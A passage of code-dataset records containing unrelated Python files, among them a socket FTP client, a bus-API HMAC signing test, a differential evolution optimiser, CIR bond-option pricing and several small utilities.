self.main.setWindowTitle(f\"Welcome {str}\")\r\n self.main.show()\r\n def load(self):\r\n self.L=LoadingScreen()\r\n def start2(self):\r\n self.reg.close()\r\n self.window=Start(windowTitle='Choose')\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n def signout(self):\r\n self.main.close()\r\n self.window=Start(windowTitle='Choose')\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n \r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n w=Controller()\r\n w.show_start()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n 
main()\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198431546","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 测试类\n# 参考地址 https://github.com/hanandjun/weifangbus/blob/develop/lib/utils/requestParamsUtil.dart\nimport time\nimport random\nimport hashlib\nimport hmac\nimport base64\n\n# 59485eebe12042cba33e972f77834b6b 聊城\n# 55b73c446e914785862966abf9a29416 潍坊\napp_key = \"55b73c446e914785862966abf9a29416\"\n\n\n# 获取时间戳\ndef _get_time_stamp():\n str_time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n return str_time\n\n\n# 获取随机数 100-1000\ndef _get_random():\n return random.randint(100, 1000)\n\n\n# 生成签名密钥\ndef _get_sign_key(time_stamp, rand):\n message = bytes(str(time_stamp) + str(rand), encoding=\"utf-8\")\n secret = bytes(app_key, \"utf-8\")\n signature = base64.b64encode(hmac.new(secret, message, digestmod=hashlib.sha256).digest())\n print(signature)\n\n\nif __name__ == '__main__':\n time_stamp = _get_time_stamp()\n rand = _get_random()\n _get_sign_key(time_stamp, rand)\n","sub_path":"SmallDemo/demo/weiFangBus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"5282554","text":"\nimport socket\nimport json,hashlib,time\nimport os\nimport sys\nimport threading\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nfrom conf import settings\n\n'''\n仅用于测试进度条是否可用。\n兼做测试断点续传。\n'''\n\nuser_data = {\n 'account_id':None,\n 'is_authenticated':False,\n 'current_dir':None,\n 'account_data':None\n}\n\n\ndef view_bar(num, total): # 显示进度条\n rate = num / total\n rate_num = int(rate * 100)\n number = int(50 * rate)\n r = '\\r[%s%s]%d%%' % (\"#\" * number, \" \" * (50 - number), rate_num,)\n # print(\"\\r {}\".format(r), end=\" \") # \\r回到行的开头\n print(\" {}\".format(r), end=\" \") # \\r回到行的开头\n\n\n\n\nclass FtpClient(object):\n def __init__(self):\n self.client = socket.socket()\n def help(self):\n msg = '''\n ls\n lls\n pwd\n cd ../..\n get filename\n put filename\n mkdir dirname\n bye\n '''\n print(msg)\n def connect(self,ip,port):\n self.client.connect((ip, port))\n\n def authenticate(self):\n self.account = input(\"\\033[32;1maccount:\\033[0m\").strip() # 用户的账户名\n password = input(\"\\033[32;1mpassword:\\033[0m\").strip() # 用户的密码\n msg_dic={\n 'action':'auth',\n 'username':self.account,\n 'password':password\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n return res_dic\n\n\n\n\n def interactive(self):\n retry_count = 0\n while user_data['is_authenticated'] is not True and retry_count < 3:\n auth=self.authenticate()\n if auth['res_type']==0:\n user_data['is_authenticated'] = True\n user_data['account_id'] = auth['res_data']['id']\n user_data['account_data'] = auth['res_data']\n user_data['current_dir'] = auth['res_data']['home_dir']\n break\n elif auth['res_type']==1:\n print(auth['res_data'])\n elif auth['res_type'] == 2:\n print(auth['res_data'])\n retry_count+=1\n else:\n print(\"账号:{},尝试登陆的次数过多!\".format(self.account))\n exit()\n\n print(\"{}用户,你好,欢迎进入Crazy FTP service,请输入你的命令。。\".format(user_data['account_id']))\n\n while user_data['is_authenticated'] is True:\n\n cmd = 
input(\"[{}/]>>\".format(user_data['current_dir'])).strip()\n if len(cmd) ==0:continue\n cmd_str = cmd.split()[0]\n if hasattr(self,\"cmd_%s\" % cmd_str):\n func = getattr(self,\"cmd_%s\" % cmd_str)\n func(cmd)\n else:\n self.help()\n\n def cmd_ls(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n dirname = user_data['current_dir']+'/'+cmd_split[1]\n else:\n dirname = user_data['current_dir']\n msg_dic={\n \"action\": \"ls\",\n \"dirname\":dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res_size = self.client.recv(1024) ##接受命令结果的长度\n # print(\"命令结果大小:\", cmd_res_size)\n received_size = 0\n received_data = b''\n while received_size < int(cmd_res_size.decode()):\n data = self.client.recv(1024)\n received_size += len(data)\n received_data += data\n else:\n print(\"当前FTP目录:{},其内容为:\".format(dirname))\n print(received_data.decode())\n def cmd_lls(self,*args):\n '''查看本地下载目录的内容。'''\n local_file_dir = settings.ACCOUNT_BASE['file_dir']\n\n if os.name == 'nt':\n cmd_res = \" \".join(os.listdir(local_file_dir))\n else:\n cmd_res = os.popen('ls'+' '+local_file_dir+'-l').read()\n print('本地目录:{},的内容为:'.format(local_file_dir))\n print(cmd_res)\n\n\n def cmd_cd(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n if cmd_split[1]=='..':\n list_dir_name=user_data['current_dir'].split('/')\n if len(list_dir_name)>1:\n list_dir_name.pop()\n if len(list_dir_name)==1:\n dirname =list_dir_name[0]\n else:\n dirname=\"/\".join(list_dir_name)\n else:\n print('这个没有父目录。')\n dirname = user_data['current_dir']\n elif cmd_split[1].isalnum():\n dirname = user_data['current_dir'] + '/' + cmd_split[1]\n else:\n dirname = user_data['current_dir']\n\n else:\n dirname = user_data['current_dir']\n\n msg_dic = {\n \"action\": \"cd\",\n \"dirname\": dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res = self.client.recv(1024)\n cmd_dic=json.loads(cmd_res.decode())\n if cmd_dic['res_type']==0:\n user_data['current_dir']=dirname\n print(\"当前目录为:{}\".format(dirname))\n else:\n print(\"目录不存在:{}\".format(dirname))\n def cmd_pwd(self,*args):\n cmd_split = args[0].split()\n if cmd_split[0]=='pwd':\n print('当前目录为:/{}/'.format(user_data['current_dir']))\n\n\n def cmd_mkdir(self,*args):\n cmd_split = args[0].split()\n\n if len(cmd_split) > 1:\n\n if cmd_split[1].isalnum():\n dirname = user_data['current_dir']+'/'+cmd_split[1]\n msg_dic = {\n \"action\": \"mkdir\",\n \"dirname\": dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res = self.client.recv(1024)\n res_dic=json.loads(cmd_res.decode())\n if res_dic['res_type'] == 0:\n print(\"目录创建成功:{}\".format(res_dic['res_data']))\n else:\n print(\"创建失败:{}\".format(res_dic['res_data']))\n else:\n print(\"输入的目录名称有误,不支持特殊字符。\")\n else:\n print(\"不能创建一个空目录。\")\n pass\n\n\n def cmd_bye(self,*args):\n self.client.shutdown(1)\n exit(\"Goodbye!\")\n\n\n\n\n def cmd_put(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) >1:\n filename = cmd_split[1]\n abs_filename=settings.ACCOUNT_BASE['file_dir']+'/'+filename\n current_dir=user_data['current_dir']\n\n if os.path.isfile(abs_filename):\n filesize = os.stat(abs_filename).st_size\n msg_dic = {\n \"action\": \"put\",\n \"filename\":filename,\n \"size\": filesize,\n \"overridden\":True,\n \"current_dir\":current_dir\n }\n self.client.send( 
json.dumps(msg_dic).encode(\"utf-8\") )\n print(\"send file size\",filesize )\n #防止粘包,等服务器确认\n server_response = self.client.recv(1024)\n res_dic=json.loads(server_response.decode())\n if res_dic['res_type']==0:\n f = open(abs_filename,\"rb\")\n m = hashlib.md5()\n for line in f:\n m.update(line)\n self.client.send(line)\n\n\n else:\n\n print(\"file md5\", m.hexdigest())\n self.client.send(m.hexdigest().encode()) # send md5\n f.close()\n print(\"文件上传成功...\")\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n if res_dic['res_type'] == 0:\n print(res_dic['res_data'])\n else:\n print(res_dic['res_data'])\n else:\n print(res_dic['res_data'])\n\n else:\n print(filename,\"is not exist\")\n def cmd_get(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n filename = cmd_split[1]\n abs_file_dir=settings.ACCOUNT_BASE['file_dir']\n self.abs_filename = settings.ACCOUNT_BASE['file_dir'] + '/' + filename\n if os.path.isfile(self.abs_filename):\n print(\"文件:{},在本地目录已经存在。\".format(self.abs_filename))\n\n else:\n msg_dic = {\n \"action\": \"get\",\n \"filename\": filename,\n \"size\": None,\n \"current_dir\": user_data['current_dir']\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n\n # 等服务器发送文件大小过来。\n\n\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n if res_dic['res_type']==0:\n self.file_total_size=res_dic['res_data']\n print(\"返回文件的大小:{}\".format(self.file_total_size) )\n self.client.send(\"准备好了,发吧。\".encode(\"utf-8\"))\n received_size = 0\n received_data = b''\n f = open(self.abs_filename, \"wb\")\n event.set()\n start_time=time.time()\n\n while received_size < self.file_total_size:\n if self.file_total_size - received_size > 1024:\n size = 1024\n else:\n size = self.file_total_size - received_size\n data = self.client.recv(size)\n received_size += len(data)\n\n f.write(data)\n\n else:\n event.clear()\n f.close()\n m = hashlib.md5()\n with open(self.abs_filename,'rb') as f2:\n m.update(f2.read())\n new_file_md5 = m.hexdigest()\n print(\"file recv done\")\n print(\"耗时:{}s\".format(time.time()-start_time))\n\n server_file_md5 = self.client.recv(1024)\n print(\"server file md5:\", server_file_md5.decode())\n print(\"client file md5:\", new_file_md5)\n if server_file_md5.decode() == new_file_md5:\n print(\"MD5校验码一致。\")\n else:\n print(\"MD5校验码不一致。\")\n else:\n print(res_dic['res_data'])\n\n def downprogress(self, *args):\n while True:\n if event.is_set():\n print(\"文件创建了,开始准备进度条。\")\n self.filename = self.abs_filename\n self.file_size = 0\n self.file_total = self.file_total_size\n while self.file_size < self.file_total: # 获取当前下载进度\n time.sleep(1)\n if os.path.exists(self.filename):\n self.down_rate = (os.path.getsize(self.filename) - self.file_size) / 1024 / 1024\n self.down_time = (self.file_total - self.file_size) / 1024 / 1024 / self.down_rate\n # print(\" \" + str('%.2f' % self.down_rate + \"MB/s\"), end=\"\")\n self.file_size = os.path.getsize(self.filename)\n # print(\"\\r \" + str(int(self.down_time)) + \"s\",\" \" + str('%.2f' % (self.file_size / 1024 / 1024)) + \"MB\", end=\"\")\n # print(\" \" + str('%.2f' % (self.file_size / 1024 / 1024)) + \"MB\", end=\"\")\n view_bar(self.file_size, self.file_total)\n else:\n event.wait()\n\n\nftp = FtpClient()\nftp.connect(\"localhost\",9999)\nevent = threading.Event()\n# ftp.connect(\"192.168.88.128\",9999)\nf1 = 
threading.Thread(target=ftp.interactive,)\n\nf1.start()\nftp.downprogress()","sub_path":"ftp_client/core/down_load_progress.py","file_name":"down_load_progress.py","file_ext":"py","file_size_in_byte":12799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50013556","text":"import numpy as np\n\n\ndef objective_function(x):\n sum = 0\n for i in range(len(x)):\n sum += x[i]**2\n return sum / len(x)\n\n\nbounds = [(-5, 5)] * 5\n\n\ndef differential_evolution(objective_function, bounds, max_gen=100, mutation_factor=0.8,\n crossover_probability=0.7, population_size=10):\n \"\"\"\n differential evolution program to minimize a function\n \"\"\"\n\n dimension = 5\n population = np.random.rand(population_size, dimension)\n lower_bound, upper_bound = np.asarray(bounds).T\n difference = np.fabs(lower_bound - upper_bound)\n initial_population = lower_bound + population * difference\n print(\"initial pop: \", initial_population)\n fitness = np.asarray([objective_function(ind) for ind in initial_population])\n print(\"fitness : \", fitness)\n best_index = np.argmin(fitness)\n best = initial_population[best_index]\n print(\"best : \", best)\n for i in range(max_gen):\n for j in range(population_size):\n indices = [index for index in range(population_size) if index != j]\n\n x0, x1, x2 = population[np.random.choice(indices, 3, replace=False)]\n \n mutant_vector = np.clip(x0 + mutation_factor * (x1 - x2), 0, 1)\n \n crossover = np.random.rand(dimension) < crossover_probability\n\n if not np.any(crossover):\n crossover[np.random.randint(0, dimension)] = True\n\n trial_vector = np.where(crossover, mutant_vector, population[j])\n \n new_population = lower_bound + trial_vector * difference\n\n new_fitness = objective_function(new_population)\n\n # print(\"\\nnew fitness : \", new_fitness)\n # print(\"fitness[\", j, \"]\", fitness[j])\n\n # print(\"new_fitness.all() < fitness[j].all() :\", new_fitness < fitness[j])\n\n if new_fitness < fitness[j]:\n fitness[j] = new_fitness\n population[j] = trial_vector\n if new_fitness < fitness[best_index]:\n best_index = j\n best = new_population\n yield best, fitness[best_index]\n\n\nprint(differential_evolution.__doc__)\nfor best, fitness in differential_evolution(objective_function, bounds):\n print(\"best = \", best, \"fitness = \", fitness)\n\n","sub_path":"differentialEvol.py","file_name":"differentialEvol.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525761608","text":"import sys\n\nfrom graphics import *\nRadius = 30\nCx = 0.5 #0.7454294\nCy = 0.0\nSide = 1.3 #1.7 \nM = 300\nN = 1\nNum = 256*N\nsT=5\nw = 0\n# x = 0.0\n# y = 0.0\n\nimport random\np = M/2+random.randrange(-M/2,M/2)\nq = M/2+random.randrange(-M/2,M/2)\n\nwin = GraphWin(\"Mandelbrot\", int(5*M/3),int(5*M/3))\n\n\ndef rectCol(p,q,w):\n Rect = Rectangle(Point(int(p-sT/2),int(q-sT/2)), \n Point(int(p+sT/2),int(q+sT/2))) \n Rect.draw(win).setFill(color_rgb(int(10*w%255), \n int((128-10*w)%255),int((128+10*w)%255)))\n\ni = 1\nwhile i > 0:\n p = p+random.randrange(-1,2)*sT\n q = q+random.randrange(-1,2)*sT\n if p < 0:\n p = p+2\n elif p > M:\n p = p-2\n \n if q < 0:\n q = q+2\n elif q > M:\n q = q-2\n Incx = Cx - Side + 2 * Side/M*q#-Side + 2*Side/M*q\n Incy= Cy - Side + 2 *Side/ M*p #- Side + 2*Side/M*p\n x = 0.0#Incx\n y = 0.0#Incy\n w=0\n for n in range(1,Num):\n xx = x*x - y*y - Incx# Cx\n yy = 2*x*y - Incy#Cy\n x = xx\n y = yy\n if x*x + y*y > 
Radius:\n w = n/N\n rectCol(int(M/3+q),int(M/3+p),int(w))\n break\nwin.getMouse()\nwin.close()\n","sub_path":"Cellular Automata.py","file_name":"Cellular Automata.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"647349083","text":"#!/usr/bin/env python3\nimport numpy as np\nfrom getdist import loadMCSamples\nimport sys, os\n\nif len(sys.argv) != 3:\n print('Usage: {} FILE_ROOT CAT_TYPE'.format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n# Getting catalog type\ncat_type = sys.argv[2]\n\n# Setting parameter names and ranges\nif cat_type == 'void':\n npar = 4\n names = ['alpha', 'B', 'Snl', 'c']\n labels = [r'$\\alpha$', r'$B$', r'$\\Sigma_{\\rm nl}$', r'$c$']\nelif cat_type=='gal':\n npar = 3\n names = ['alpha', 'B', 'Snl']\n labels = [r'$\\alpha$', r'$B$', r'$\\Sigma_{\\rm nl}$']\nelse:\n sys.exit('ERROR:\\tCatalog type not understood.\\nCAT_TYPE=void, gal\\n')\n\nlowbound = ['N'] * npar\nupbound = ['N'] * npar\n\n# I/O files\nfileroot = sys.argv[1]\npath, name = os.path.split(fileroot)\nif path == '':\n fileroot = './' + fileroot\nchains = fileroot + '.txt'\nfparam = fileroot + '.paramnames'\nfrange = fileroot + '.ranges'\nofile = fileroot + 'mystats.txt'\nif not os.path.isfile(chains):\n print('Error: cannot access {}'.format(chains), file=sys.stderr)\n sys.exit(1)\n\nnp.savetxt(fparam, np.transpose([names, labels]), fmt='%s')\nnp.savetxt(frange, np.transpose([names, lowbound, upbound]), fmt='%s')\n\n# Load sample from FILE_ROOT.txt\nsample = loadMCSamples(fileroot, \\\n settings={'fine_bins_2D':1024,'fine_bins':8192})\n\nstats = sample.getMargeStats()\npar = stats.parWithName(names[0])\nlower = par.limits[0].lower\nupper = par.limits[0].upper\nsigma = (upper - lower) * 0.5\nbest = (upper + lower) * 0.5\n\n# Read evidence from FILE_ROOTstats.dat\nfstat = fileroot + 'stats.dat'\nwith open(fstat, \"r\") as f:\n f.readline()\n line = f.readline()\n evi = float(line.split(':')[1].split()[0])\n\nwith open(ofile, \"w\") as f:\n f.write('{0:.5f} {1:.6f} {2:.6f}'.format(best, sigma, evi))\n\n","sub_path":"src/baofit/stats_center.py","file_name":"stats_center.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"123357004","text":"from agent.check_plugins.ping import Ping\r\nimport asyncio\r\nimport aiohttp\r\nimport unittest\r\nimport json\r\n\r\n\r\nclass TestPingPlugin(unittest.TestCase):\r\n def setUp(self):\r\n self.loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(None)\r\n\r\n def tearDown(self):\r\n self.loop.stop()\r\n self.loop.run_forever()\r\n self.loop.close()\r\n\r\n def test_get_result(self):\r\n\r\n @asyncio.coroutine\r\n def go():\r\n queue = asyncio.Queue(loop=self.loop)\r\n ping = Ping(self.loop, queue)\r\n with aiohttp.ClientSession(loop=self.loop) as client:\r\n yield from ping(client, 'http://httpbin.org/get')\r\n cor_result = yield from queue.get()\r\n result = yield from cor_result\r\n result = json.loads(result)\r\n self.assertIsInstance(result, dict)\r\n self.assertEqual(result['url'], 'http://httpbin.org/get')\r\n\r\n self.loop.run_until_complete(go())","sub_path":"tests/test_ping_plugin.py","file_name":"test_ping_plugin.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"86959123","text":"import numpy as np\nfrom numpy import linalg\nfrom scipy.stats import 
ncx2\nimport math\nimport statistics\nimport Question1\n\n\ndef question2():\n k = 0.92\n r0 = 0.05\n sigma = 0.12\n ravg = 0.055\n np.random.seed(1234)\n\n #a\n expiry = 0.5\n strike = 980\n no_of_sim = 250\n time = 1\n step_size = 1/252\n fv = 1000\n\n #With explicit for underlying\n price_call_dis_bond_2 = price_call_discount_bond(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike)\n\n #With monte carlo for underlying\n price_call_dis_bond = price_call_discount_bond_mc(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry,strike)\n print(\"The discount bond call price is {0:.4f}\".format(price_call_dis_bond))\n\n #b\n step_size = 1/365\n dx = 0.001\n price_implicit = calculate_price_implicit(sigma,dx, step_size, r0, time, strike, k, ravg, fv, expiry)\n print(\"The discount bond call price using implicit method is {0:.4f}\".format(price_implicit))\n\n #c\n explicit_price = price_call_explicit(r0, expiry, time, k, sigma, ravg, strike, fv)\n print(\"The explicit price of the discount bond call is {0:.4f}\".format(explicit_price))\n\ndef price_call_discount_bond_mc(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike):\n no_of_steps = int(expiry/step_size)\n call_prices = [None]*no_of_sim\n for simCount in range(1,no_of_sim+1):\n randoms = np.random.normal(0,1,no_of_steps)\n r_path = build_r_path(r0, no_of_steps, k, ravg, step_size, sigma, randoms)\n price = Question1.price_discount_bond(r_path[no_of_steps-1], sigma, k, ravg, fv, time-expiry, 2*(time-expiry)/no_of_steps,\n no_of_sim)\n call_prices[simCount-1] = math.exp(-sum(r_path) * step_size)*max(price-strike,0.0)\n\n return statistics.mean(call_prices)\n\ndef price_call_discount_bond(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike):\n no_of_steps = int(expiry/step_size)\n call_prices = [None]*no_of_sim\n for simCount in range(1,no_of_sim+1):\n randoms = np.random.normal(0,1,no_of_steps)\n r_path = build_r_path(r0, no_of_steps, k, ravg, step_size, sigma, randoms)\n price = Question1.price_discount_bond_explicit(r_path[no_of_steps-1], sigma, k, ravg, expiry, time, fv)\n call_prices[simCount-1] = math.exp(-sum(r_path) * step_size)*max(price-strike,0.0)\n\n return statistics.mean(call_prices)\n\n\ndef calculate_price_implicit(sigma,dx, step_size, r0, time, strike, k, ravg, fv, expiry):\n\n no_of_paths = int(r0/dx)\n\n # Generate rates and calculate terminal prices\n rate_path = [r0 + dx*count for count in range(no_of_paths, -no_of_paths - 1, -1)]\n\n #prices_ter = [max(Question1.price_discount_bond_explicit(rate, sigma, k, ravg, expiry, time, fv) - strike, 0.0)\n # for rate in rate_path]\n prices_ter = [max(Question1.price_discount_bond(rate, sigma, k, ravg, fv, (time-expiry), 1/252, 1000) - strike, 0.0)\n for rate in rate_path]\n\n # Generate call Prices\n max_time_steps = int(expiry / step_size)\n call_prices = np.full([2 * no_of_paths + 1, max_time_steps], np.nan)\n call_prices[:, (max_time_steps - 1)] = prices_ter\n\n # Calculate price at every time\n for count in range(max_time_steps - 2, -1, -1):\n call_prices[:, count] = calculate_IFD(no_of_paths, call_prices[:, count + 1], rate_path, step_size,\n sigma, dx, ravg, k)\n\n return call_prices[no_of_paths,0]\n\n\ndef calculate_ps(dt, sigma, dx, r, ravg, k):\n pu = -0.5 * dt * (((sigma ** 2) * r / (dx ** 2)) + ((k * (ravg - r)) / dx))\n pm = 1 + dt * ((sigma ** 2)* r / dx ** 2) + r * dt\n pd = -0.5 * dt * (((sigma ** 2) * r / (dx ** 2)) - ((k * (ravg - r)) / dx))\n\n return [pu, pm, pd]\n\ndef build_r_path(r0, no_of_steps, k, ravg, 
step_size, sigma, randoms):\n r_path = [None] * (no_of_steps + 1)\n r_path[0] = r0\n\n for count in range(1, no_of_steps + 1):\n dr = k * (ravg - abs(r_path[count - 1])) * step_size + sigma * math.sqrt(step_size) \\\n * math.sqrt(abs(r_path[count - 1])) * randoms[count - 1]\n r_path[count] = abs(r_path[count-1]) + dr\n return r_path\n\ndef calculate_IFD(no_of_paths, call_prices_next, r_path, step_size, sigma, dx, ravg, k):\n mat_a = np.zeros([2 * no_of_paths + 1, 2 * no_of_paths + 1])\n mat_a[0, 0] = 1\n mat_a[0, 1] = -1\n\n for count in range(1, 2 * no_of_paths):\n ps = calculate_ps(step_size, sigma, dx, r_path[count], ravg, k)\n mat_a[count, count - 1] = ps[0]\n mat_a[count, count] = ps[1]\n mat_a[count, count + 1] = ps[2]\n\n mat_a[2 * no_of_paths, 2 * no_of_paths - 1] = 1\n mat_a[2 * no_of_paths, 2 * no_of_paths] = -1\n\n mat_b = np.zeros([2 * no_of_paths + 1, 1])\n mat_b[1:(2 * no_of_paths - 1), 0] = call_prices_next[1:(2 * no_of_paths - 1)]\n mat_b[0, 0] = r_path[0] - r_path[1]\n\n mat_f = np.dot(linalg.inv(mat_a), mat_b)\n return mat_f[:, 0]\n\n\ndef price_call_explicit(r0, expiry, time, k, sigma, ravg, strike, fv):\n ab = calculate_a_b(expiry, time, k, sigma, ravg)\n\n r_star = math.log(ab[0]/(strike/fv)) / ab[1]\n theta = math.sqrt(k**2 + (2 * (sigma**2)))\n phi = 2*theta/((sigma**2)*(math.exp(theta * expiry)-1))\n psi = (k + theta)/(sigma ** 2)\n price_1 = price_bond_explicit(r0, time, k, sigma, ravg)\n price_2 = price_bond_explicit(r0, expiry, k, sigma, ravg)\n\n chi2_1 = chisq(2*r_star*(phi+psi+ab[1]),4*k*ravg/(sigma**2),\n (2 * (phi**2) * r0 * math.exp(theta*expiry))/(phi + psi + ab[1]))\n\n chi2_2 = chisq(2*r_star*(phi+psi),4*k*ravg/(sigma**2),\n (2 * (phi**2) * r0 * math.exp(theta*expiry))/(phi + psi))\n\n call_price = (fv * price_1 * chi2_1) - (strike * price_2 * chi2_2)\n\n return call_price\n\ndef price_bond_explicit(rt, time, k, sigma, ravg):\n ab = calculate_a_b(0, time, k, sigma, ravg)\n return ab[0] * math.exp(-ab[1]*rt)\n\ndef calculate_a_b(expiry, time, k , sigma, ravg):\n h1 = math.sqrt(k ** 2 + 2 * (sigma ** 2))\n h2 = (k + h1) / 2\n h3 = (2 * k * ravg) / (sigma ** 2)\n\n nmtr_b = math.exp(h1 * (time-expiry)) - 1\n dmtr_b = h2 * (math.exp(h1 * (time-expiry)) - 1) + h1\n\n b = nmtr_b/dmtr_b\n\n nmtr_a = h1 * math.exp(h2 * (time-expiry))\n dmtr_a = h2 * (math.exp(h1 * (time-expiry)) - 1) + h1\n\n a = (nmtr_a/dmtr_a) ** h3\n\n return [a,b]\n\ndef chisq(x, p, q):\n return ncx2.cdf(x, p, q)\n\n","sub_path":"237G_Computational/Projects/Project8/Python_backup/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376271045","text":"\nimport json\n\n\ndef concateName(nameList):\n\tr = ''\n\tfor name in nameList:\n\t\tname = name.replace(\",\", \" \")\n\t\tr = r + ' ' + name.strip()\n\treturn r.strip()\n\t\t\t\n\t\nif __name__ == '__main__':\n\twith open('data.json', 'r') as f:\n\t\tdata = json.load(f)\n\n\tnewData = list()\n\tfor d in data:\n\t\tname = d['company']['name']\n\t\tif type(name) == list:\n\t\t\tname = concateName(name)\n\t\tnewData.append((name, d['job_title'], d['week_work_time']))\n\t\n\tnewData.sort(reverse=True, key=lambda x:x[2])\n\t\n\tfor d in newData:\n\t\tprint('%s, %s, %d' % (d[0], d[1], d[2]))\n\t\t","sub_path":"statByTime.py","file_name":"statByTime.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
+{"seq_id":"30855602","text":"class ListNode:\n def __init__(self, x, nxt=None):\n self.val = x\n self.next = nxt\n\nclass LinkedList:\n def __init__(self):\n self.h = None\n self.t = None\n\n def __add__(self, other):\n self.t.next = other\n return self.h\n\n def append(self, x):\n if not self.h:\n self.h = x\n self.t = x\n else:\n self.t.next = x\n self.t = x\n\ndef traverse(head):\n if head:\n p = head\n print(p.val)\n while p.next:\n p = p.next\n print(p.val)\n print('--- end traversing ---')\n\ndef merge(list0, list1):\n p0 = list0\n p1 = list1\n mer = LinkedList()\n while p0 and p1:\n if p0.val > p1.val:\n mer.append(ListNode(p1.val))\n p1 = p1.next\n else:\n mer.append(ListNode(p0.val))\n p0 = p0.next\n\n if p0:\n mer += p0 # 这里返回self.h, mer类型被重置为 ListNode\n if p1:\n mer += p1\n return mer\n\nh0 = ListNode(2, ListNode(5, ListNode(7, ListNode(10, ListNode(17)))))\nh1 = ListNode(4, ListNode(5, ListNode(6)))\nh = merge(h0, h1)\nprint(type(h))\ntraverse(h)","sub_path":"剑指offer/016-合并有序链表/mergeOrd.py","file_name":"mergeOrd.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74091452","text":"#!/usr/bin/env python3\n\nfrom main_window import MainWindow\nfrom PyQt5.QtWidgets import QApplication\n\ndef main():\n\t\"\"\"\n\tThe main function, runs when the script is called from the command line\n\n\t\"\"\"\n\t# Handler for the event loop\n\tapplication = QApplication([])\n\n\t# Makes an instance of the MainWindow class\n\tmainWindow = MainWindow()\n\t# Calls MainWindow method .show()\n\tmainWindow.show()\n\n\t# .exec begins the while loop for the event loop, does not exit until receives\n\t# user input\n\texit(application.exec())\n\n\n\n\n\n\n\nif (__name__ == '__main__'):\n\tmain()","sub_path":"adventure_threadsignal/character_select_window.py","file_name":"character_select_window.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"47724767","text":"from pyjexl.analysis import ValidatingAnalyzer\n\nfrom ..core.jexl import JEXL\n\n\nclass QuestionValidatingAnalyzer(ValidatingAnalyzer):\n def visit_Transform(self, transform):\n if transform.name == \"answer\" and not isinstance(transform.subject.value, str):\n yield f\"{transform.subject.value} is not a valid question slug.\"\n\n yield from super().visit_Transform(transform)\n\n\nclass QuestionJexl(JEXL):\n def __init__(self, answer_by_question={}, **kwargs):\n super().__init__(**kwargs)\n\n self.context = answer_by_question\n self.add_transform(\"answer\", self.answer_transform)\n self.add_transform(\"mapby\", lambda arr, key: [obj[key] for obj in arr])\n self.add_binary_operator(\n \"intersects\", 20, lambda left, right: any(x in right for x in left)\n )\n\n def answer_transform(self, question_with_path):\n current_context = self.context\n segments = question_with_path.split(\".\")\n\n # Allow question paths to originate from the toplevel (root) document\n if segments[0] == \"root\":\n while \"parent\" in current_context:\n current_context = current_context[\"parent\"]\n segments = segments[1:]\n\n try:\n for segment in segments:\n current_context = current_context[segment]\n return current_context\n except KeyError:\n explanation = \"\"\n if len(segments) > 1:\n explanation = f\" (failed at segment '{segment}')\"\n\n available_keys = \", \".join(current_context.keys())\n raise RuntimeError(\n f\"Question could not be resolved: 
